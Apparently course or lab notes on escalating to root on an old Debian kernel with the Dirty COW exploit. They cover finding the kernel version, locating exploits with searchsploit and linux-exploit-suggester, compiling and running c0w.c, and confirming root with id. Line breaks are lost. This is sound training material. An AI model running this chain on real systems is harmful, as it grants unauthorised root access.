find system info to google for exploits:
uname -aoutput:
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/LinuxWhat we Google for:
Linux debian 2.6.32-5-amd64 exploitwe can also searchsploit!
Dirty COW:
Race Condition Privilege Escalation
We can also identify dirtycow using linux-exploit-suggester
Compile cow:
gcc -pthread c0w.c -o cowWe can use id:
idto check what user we are before exploiting.
run cow:
./cowit can take a while.
it still says TCM, how do we switch?
it said backing up passwd. It overwrites that files. We can type that in terminal to switch:
passwdcheck who we are again:
idroot!
